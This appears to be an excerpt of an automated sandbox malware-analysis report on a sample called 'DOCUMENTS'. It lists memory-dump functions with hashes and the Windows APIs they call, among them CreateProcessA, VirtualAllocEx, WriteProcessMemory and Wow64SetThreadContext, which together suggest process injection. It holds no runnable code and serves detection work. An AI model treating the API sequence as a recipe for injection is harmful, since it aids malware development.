Opcode ID: 00444cbaa69f49e157d8f9b43b508a624c07484971a4f7acdf9dc92c073df677
Instruction ID: 372fa5a849194d97ffd4630d21a3723aba56860fe6717da23a2cca85b677c4d0
Opcode Fuzzy Hash: 00444cbaa69f49e157d8f9b43b508a624c07484971a4f7acdf9dc92c073df677
Instruction Fuzzy Hash: 31D122B4E10218CFCF14CFA8C894BAEBBB2FB49315F109069E919A7391DB785985CF50

Function 08F1BE68 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1624660312.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f10000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b5da4187da137b30443341e8a39cb414bfa4cd2cab656d4ff782fd0c6059c56
Instruction ID: 079b37209f776f9e4535ab368470eedd572cec1bcf779a4b4432d2507938c7fa
Opcode Fuzzy Hash: 4b5da4187da137b30443341e8a39cb414bfa4cd2cab656d4ff782fd0c6059c56
Instruction Fuzzy Hash: D6D122B4E10218CFCF14CFA8C894BAEBBB2FB49315F109069E919A7391DB795985CF50

Function 08F1B2E8 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1624660312.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f10000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be79d68493ba1826f8b10ac5942b49d9db0b2d20e8038404d7cf7e4d17b6e9ff
Instruction ID: 5f1d2999f233dcf8cfa281c7bc15800e0a363baee0d0d704fdb62ec62ad7ee51
Opcode Fuzzy Hash: be79d68493ba1826f8b10ac5942b49d9db0b2d20e8038404d7cf7e4d17b6e9ff
Instruction Fuzzy Hash: 17C102B4E02218CFDB14DFA9D894BADBBB2FB49315F2490A9D409A7391DB306D85CF40

Function 08F070A8 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42489cdb90e9f83e6c130a9db44b7967c47c53ab0c5e0f42fe31344cce8a78f4
Instruction ID: 952824c498c4f8a85e8d34ad6a817305b4b1227e19c7b48d866b81b345ba4012
Opcode Fuzzy Hash: 42489cdb90e9f83e6c130a9db44b7967c47c53ab0c5e0f42fe31344cce8a78f4
Instruction Fuzzy Hash: A3C12B74E05208CFDB24DFA9D844BADBBF2FF49306F1090A9D409A7281DB766986DF01

Function 08F1B2F8 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1624660312.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f10000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31b4c87a6f62ba43096fb0c3fc147214403a0ec9a53d7106435882ad45ea2c59
Instruction ID: 944507ef5650c3221371f3cfacc8ecbe4ef7c3af304b1ad59c717ff502df1c40
Opcode Fuzzy Hash: 31b4c87a6f62ba43096fb0c3fc147214403a0ec9a53d7106435882ad45ea2c59
Instruction Fuzzy Hash: D7C101B4E01218CFDB14CFA9D894BADBBB2FB89315F2490A9D409A7395DB306D85CF40

Function 08F07097 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 029de9189dc5c575e5499ab019c05f9ce9949e4a0a58f7cd413ea54db0e80a99
Instruction ID: 03969450c174a61b0f5d4ed860f6e58060eb652127bb65525a123931fc6ef263
Opcode Fuzzy Hash: 029de9189dc5c575e5499ab019c05f9ce9949e4a0a58f7cd413ea54db0e80a99
Instruction Fuzzy Hash: 64C11D74E01208CFEB24DFB9D844B9DBBF2FB49306F1490A9D409A7291DB766985DF01

Function 08F0BB98 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0cd9d4f34243b507a78106f6564662e29bcb0664371121b9c4af43c4923157c
Instruction ID: 61cb4080ef7c01a658ea67ee785461ef324b85bdb9a7cdfce26366cf260e7504
Opcode Fuzzy Hash: e0cd9d4f34243b507a78106f6564662e29bcb0664371121b9c4af43c4923157c
Instruction Fuzzy Hash: D9C1F6B4E01219CFDB64CF69C850BADBBB2FB89310F1085AAD50DA7351DB31AA85CF51

Function 08E767A8 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1623893189.0000000008E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8e70000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 957443d1e92d309800fbf6d0eff2d966c387634b10ab95c0cf50ba0a0c5dbdaa
Instruction ID: 488335c1f0d7be6ec21ad45b78a44fa63c898be479e70d6120e8e4f8fd695b37
Opcode Fuzzy Hash: 957443d1e92d309800fbf6d0eff2d966c387634b10ab95c0cf50ba0a0c5dbdaa
Instruction Fuzzy Hash: 2CB1F871E06618CFEB14CFA9D884BEDBBF2FB59319F14A069D409A7261EB705985CF00

Function 08E76798 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1623893189.0000000008E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8e70000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4727637f11c8a5f9e58c8356eda65a63d1cb91e42835ed2fd3dfd967e71024c
Instruction ID: 078f17c5dfabc9cc2157e94c1228ab76e4bfd9b56e8b22056dff2d702eee7d03
Opcode Fuzzy Hash: c4727637f11c8a5f9e58c8356eda65a63d1cb91e42835ed2fd3dfd967e71024c
Instruction Fuzzy Hash: DCB10671E02618CFEB14CFA9D884BDDBBF2FB59319F2490A9D409A7261EB705985CF00

Function 08F0BC0F Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 027d8a7cb0e5f6cf9f43c67ff03ca2988e9226d8da2764c92c5215f2e37812f4
Instruction ID: abf8d0f898c6bea0f6b71fd170dde74bddf6fa72bb0647d01d67c6236aee5879
Opcode Fuzzy Hash: 027d8a7cb0e5f6cf9f43c67ff03ca2988e9226d8da2764c92c5215f2e37812f4
Instruction Fuzzy Hash: 07B1D5B4E01219CFDB64CF69C850BADBBB2FB89300F1085AAD50DA7351DB30AA85CF51

Function 08126330 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1621634587.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8120000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 956a194952ffeba678c3e6033f4d32f86c3d0d690f9d9f136ac73d1cb9226d4d
Instruction ID: 6e2a0a22307e80e78855add2d37271a82ff0ab95b9043e3b8c9a856266c9e9c2
Opcode Fuzzy Hash: 956a194952ffeba678c3e6033f4d32f86c3d0d690f9d9f136ac73d1cb9226d4d
Instruction Fuzzy Hash: 64A159B0A01208DFEB09DFAAE842AA9BFB3FF84304F14C56AD015A7295DF356845CB51

Function 08F121D1 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1624660312.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f10000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06562b6e3d07d742c76ddc874d2bb4c05d9da35efbca41797ac6dbba7385a7a5
Instruction ID: 0f76f8f4966adac6752de8ffdff2c81ee8c7f70d428e7a1fb46a2a597f40cc08
Opcode Fuzzy Hash: 06562b6e3d07d742c76ddc874d2bb4c05d9da35efbca41797ac6dbba7385a7a5
Instruction Fuzzy Hash: 729158B0E10248CFDB54CFA9E894BADBBF2FB49305F249069D419A7395DB349981CF10

Function 08F121E0 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1624660312.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f10000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc95f19fb8738e9a0fd6b0a962600b7cbae2ac5e6890e411851e2f0a48204e8c
Instruction ID: 6f94b52531095cc9d24a13c23832b31b782c1768822f83bea839d995c5f0a6d2
Opcode Fuzzy Hash: fc95f19fb8738e9a0fd6b0a962600b7cbae2ac5e6890e411851e2f0a48204e8c
Instruction Fuzzy Hash: C7813770E15248CFDB54CFA9E894BADBBF2FB4D305F209069D419A7295DB349981CF10

Function 08F124CC Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1624660312.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f10000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04f7c4f36bfdcb98d5e1250e44376de4ae88eff88a3c11a058649a561a158936
Instruction ID: ce9974533a807c33a53a7ee6e5aa355dd93b2162283107460a39d62d564b1741
Opcode Fuzzy Hash: 04f7c4f36bfdcb98d5e1250e44376de4ae88eff88a3c11a058649a561a158936
Instruction Fuzzy Hash: A28116B0E11208CFDB54CFA9D894BADBBF2FB8D305F249069E419A7256DB349981CF10

Function 0495FA70 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1570668762.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4950000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feb88e63b428e071dd8f283d899c89dd59f3c3d9066fda36073c4ee9ea932422
Instruction ID: 1d3db872a3c38587217687985f286afe7b82157113372f30e3d34993ec70d96b
Opcode Fuzzy Hash: feb88e63b428e071dd8f283d899c89dd59f3c3d9066fda36073c4ee9ea932422
Instruction Fuzzy Hash: 82912B30620205CFDB14CF45D588BA9B7B2FB84324F25C974E8059B2AAE774F985CB62

Function 08F1243D Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1624660312.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f10000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4d0b22ff40cee66a9079b14e6733e8b49eef8ce856c7ab8c37c1a7e47034565
Instruction ID: aa67e5c2f61cdc59936d7310615046cad9942350a17c22d8675bd5a9de9c9f48
Opcode Fuzzy Hash: c4d0b22ff40cee66a9079b14e6733e8b49eef8ce856c7ab8c37c1a7e47034565
Instruction Fuzzy Hash: B77125B0E11248CFDB54CFA9D894BADBBF2FB4D305F2490A9E419A7655DB309981CF10

Function 08E7154A Relevance: 2.5, Strings: 2, Instructions: 40
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/, xrefs: 08E7182C
), xrefs: 08E71800

Memory Dump Source

Source File: 00000004.00000002.1623893189.0000000008E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8e70000_DOCUMENTS.jbxd

Similarity

API ID:
String ID: )$/
API String ID: 0-2464446594
Opcode ID: caa2cc26f11c81a585c2273832914dc82a0da979daf2948d13dd5f9a29bb27f2
Instruction ID: 80e688cd9fc279471c3babface3792c90c3f989db4a6bf35cf98c2a78562e522
Opcode Fuzzy Hash: caa2cc26f11c81a585c2273832914dc82a0da979daf2948d13dd5f9a29bb27f2
Instruction Fuzzy Hash: 8811037580522DCFCB659F28C889BECBBB0EF0A315F2451EAD509B3281CB704A81CF14

Function 08F0E694 Relevance: 1.8, APIs: 1, Instructions: 270
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08F0E907

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 29342737513ef31669fb07a6a2e331646bc37a976a922cdbad0a957e664bcf71
Instruction ID: 235be66b2c5ada2dd1865d55e755c769acb796f4e4d30c4bb704289eaec43392
Opcode Fuzzy Hash: 29342737513ef31669fb07a6a2e331646bc37a976a922cdbad0a957e664bcf71
Instruction Fuzzy Hash: D5A113B4D00218CFDB20CFB9C8457EEBBF1BB49301F14956AE858A7280DB748985DF51

Function 08F0E6A0 Relevance: 1.8, APIs: 1, Instructions: 261
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08F0E907

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 9619ef793e706b9cb04220aea95bfb85085c4e43bc4d14eacdbe006ca9acd51d
Instruction ID: 916f34f4af60c50bdef7647aca071314efbf347cc2c12da329ff87980ef05677
Opcode Fuzzy Hash: 9619ef793e706b9cb04220aea95bfb85085c4e43bc4d14eacdbe006ca9acd51d
Instruction Fuzzy Hash: 9FA102B5D00218CFDB10CFA9C885BEEBBF1BF49301F14956AE858A7280DB748985DF95

Function 08F106EC Relevance: 1.7, APIs: 1, Instructions: 160
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 08F1083C

Memory Dump Source

Source File: 00000004.00000002.1624660312.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f10000_DOCUMENTS.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0652e9a42d714acf2bd223ea15d610009798f5d96ed3d44704a5de32320cd59c
Instruction ID: 8dc792863c6eaf519c79e35ad1f59af8e8a4fa6e5132f8739d7d416ce23b9c6b
Opcode Fuzzy Hash: 0652e9a42d714acf2bd223ea15d610009798f5d96ed3d44704a5de32320cd59c
Instruction Fuzzy Hash: B751ECB4D04658DFDF20CFA9D884BEEBBB1BF49310F24912AE854A7240DB749885CF94

Function 08F106F8 Relevance: 1.7, APIs: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 08F1083C

Memory Dump Source

Source File: 00000004.00000002.1624660312.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f10000_DOCUMENTS.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 46d1f0b33d8dd5b7a8cbf7ec88b76d0a66075980cc654bd05dbee013d2bdb57c
Instruction ID: 07219b7373dd778862bdd7710734fbf4fd5e426a5438e085c819ac5a630a40c4
Opcode Fuzzy Hash: 46d1f0b33d8dd5b7a8cbf7ec88b76d0a66075980cc654bd05dbee013d2bdb57c
Instruction Fuzzy Hash: 6051CBB4D04618DFDF20CFA9D884BDEBBF1BB49310F24A12AE854A7240DB749885CF94

Function 08F1094C Relevance: 1.6, APIs: 1, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 08F10A86

Memory Dump Source

Source File: 00000004.00000002.1624660312.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f10000_DOCUMENTS.jbxd

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: b3328e22dc306b693322ac5a9370715fbe99cf9bab2f17f29d48cfc2465f30c9
Instruction ID: 9d85d3bed128b6edc2820c4abfe7c6f88b8a99e1d922b2af79bf1635d11c596e
Opcode Fuzzy Hash: b3328e22dc306b693322ac5a9370715fbe99cf9bab2f17f29d48cfc2465f30c9
Instruction Fuzzy Hash: 4E51CDB4D042489FDF10DFA9D884AEEBBB1BB49314F14902AE819AB240DB749986CF54

Function 08F10950 Relevance: 1.6, APIs: 1, Instructions: 146
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 08F10A86

Memory Dump Source

Source File: 00000004.00000002.1624660312.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f10000_DOCUMENTS.jbxd

Similarity

API ID: CreateFileMapping
String ID:
API String ID: 524692379-0
Opcode ID: 0a9596817ab10bc426ef2243b94ca5e28ad5d21de721ad1bc2279e84a0f8e479
Instruction ID: e8a03f117a88794f4b63af7f6b3d0c965f12822d35e8bd22d8b980ebe0677961
Opcode Fuzzy Hash: 0a9596817ab10bc426ef2243b94ca5e28ad5d21de721ad1bc2279e84a0f8e479
Instruction Fuzzy Hash: 3551CCB4D047089FDF10CFAAD884ADEBBB1BB49314F14902AE819AB240DB749985CF94

Function 08F10F4F Relevance: 1.6, APIs: 1, Instructions: 132
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 08F1104A

Memory Dump Source

Source File: 00000004.00000002.1624660312.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f10000_DOCUMENTS.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 77ac25bb4d56dbd3895a9c2fe0d29d1ca2f85809430e6d9e4fc699d70ae95349
Instruction ID: e96c37d68ccb7992d652d7f4e3b8762d938c15a5cb1801398acbc7bc2718589c
Opcode Fuzzy Hash: 77ac25bb4d56dbd3895a9c2fe0d29d1ca2f85809430e6d9e4fc699d70ae95349
Instruction Fuzzy Hash: 1641EEB8D043889FCF11CFA9D880ADEBBB0FF4A710F14945AE815AB211C735A946DF65

Function 08F0F110 Relevance: 1.6, APIs: 1, Instructions: 120
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 08F0F1EB

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 82926bc959fd1767533d084c6ba629b51c81fb20e802bc2d13a25bb99889b664
Instruction ID: 603c7c65ae4bb4af4edff6652eed33c644910a3efe1e2304519886d6b9f6c5c0
Opcode Fuzzy Hash: 82926bc959fd1767533d084c6ba629b51c81fb20e802bc2d13a25bb99889b664
Instruction Fuzzy Hash: AD41BAB5D012489FCB10CFA9D984ADEBBF1FB49310F24902AE815B7250C738AA45CF64

Function 08F0F118 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 08F0F1EB

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a0f6b0dee87c026805dc2e45454afe95dd2e0c6f4ac87f56710abc7b235a3ddd
Instruction ID: e099ec1b2974614c2a6debc55be6cc26b98c32e6cbec03cd96ac117e7cf1bc63
Opcode Fuzzy Hash: a0f6b0dee87c026805dc2e45454afe95dd2e0c6f4ac87f56710abc7b235a3ddd
Instruction Fuzzy Hash: 7541A8B5D012589FCB10CFAAD984ADEBBF1FB49310F14902AE818B7250C738AA45CF64

Function 08F0EFB1 Relevance: 1.6, APIs: 1, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08F0F062

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9e208fb90bc97ec2074dcea735b1477de907b18ecd54b1b91cb0b5c6c1aca23d
Instruction ID: 7e2c572dd27c112b2ad942a8804ab768b1dfcc87041ecbdb1a2764b7ad30a7e9
Opcode Fuzzy Hash: 9e208fb90bc97ec2074dcea735b1477de907b18ecd54b1b91cb0b5c6c1aca23d
Instruction Fuzzy Hash: 9D3198B9D00258DFCF10CFA9D884ADEFBB1EB49310F24942AE815B7250D735A945CF64

Function 08F0F600 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 08F0F6AC

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 523f5050e16e27ae14811aad9fc35690464dd919618420c3193b29192360a310
Instruction ID: 1a165c08fb969354b14758be26b5c843f6ce0e37a43303fd96820c989890b2f6
Opcode Fuzzy Hash: 523f5050e16e27ae14811aad9fc35690464dd919618420c3193b29192360a310
Instruction Fuzzy Hash: 1F31DDB5C042489FCF10CFAAD884AEEFBB0EF49310F14902AE815B7250DB35A945DF54

Function 08F0EFB8 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08F0F062

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bd9f52aaf2bd81ab95c9fca8b6646b022a53c1032258d63a612ebe56df890e26
Instruction ID: 51775c528f8a986369be5131dee25bf01db253d2eac423bd2a8d6b87a3ebc321
Opcode Fuzzy Hash: bd9f52aaf2bd81ab95c9fca8b6646b022a53c1032258d63a612ebe56df890e26
Instruction Fuzzy Hash: 243176B9D002589FCF10CFAAD984ADEBBB5EB49320F10942AE815B7250D735A941CF64

Function 08F10FA0 Relevance: 1.6, APIs: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 08F1104A

Memory Dump Source

Source File: 00000004.00000002.1624660312.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f10000_DOCUMENTS.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 4c5f304d8393f1fc7a5304a7ce87562d0adb4787c1c1f281c2dca398fd65c4c8
Instruction ID: c1dae872d07e6dbd3c2d4dad124c0db6961dc4808f465159dd738122c4daf542
Opcode Fuzzy Hash: 4c5f304d8393f1fc7a5304a7ce87562d0adb4787c1c1f281c2dca398fd65c4c8
Instruction Fuzzy Hash: 4A3198B9D002589FCF10CFAAD980ADEFBB1BB49310F10A42AE815B7210D735A941CF64

Function 08F0EA50 Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 08F0EB07

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 64ca46ccc660a26c1fb163a2d669bc82c2d370e0449ca6eae417ad97f0bcab6e
Instruction ID: 0876a35bb7b5ee1d31182e1c0d64d16d47ee13bae32b3ceac61b6691a8d19eec
Opcode Fuzzy Hash: 64ca46ccc660a26c1fb163a2d669bc82c2d370e0449ca6eae417ad97f0bcab6e
Instruction Fuzzy Hash: 0D41EDB5D002589FDB10DFAAD884AEEBBF1BF49310F24842AE405B7240C738A945CF64

Function 08F0F608 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 08F0F6AC

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1a86beec8b28860853a983c4ff2e118629453890c5484d39cdd7da0bccbb23e6
Instruction ID: 7f43ed1ebe57319cdda21e7ded1d811ce7f25d08267a3a2dfc33c71915f45aec
Opcode Fuzzy Hash: 1a86beec8b28860853a983c4ff2e118629453890c5484d39cdd7da0bccbb23e6
Instruction Fuzzy Hash: 9531CAB5D002589FCF10CFAAD884AEEFBB1EF49310F14942AE815B7250DB39A945CF64

Function 0906D628 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 0906D6CC

Memory Dump Source

Source File: 00000004.00000002.1624924410.0000000009060000.00000040.00000800.00020000.00000000.sdmp, Offset: 09060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9060000_DOCUMENTS.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6415129e3a6e56773151b7e9ba4dc0a688d962e78eddb14a77c1c8700157d6a3
Instruction ID: 8115b307ba610f496b087ad91ec4ad5fb1dc851af651bb3cc1eb74569472782c
Opcode Fuzzy Hash: 6415129e3a6e56773151b7e9ba4dc0a688d962e78eddb14a77c1c8700157d6a3
Instruction Fuzzy Hash: 6031A8B8D012489FCF10CFAAD884ADEFBB1AF49310F14942AE814B7210D735A945CF54

Function 08F0EA58 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 08F0EB07

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 6ba08358156648f336a0a9d5eb4c66bfb81126c578359ea1a9f475bb2863faf8
Instruction ID: 7494cf12f2c744f2c248c05975c4e1332ea66e16d97cc1506a31143389331828
Opcode Fuzzy Hash: 6ba08358156648f336a0a9d5eb4c66bfb81126c578359ea1a9f475bb2863faf8
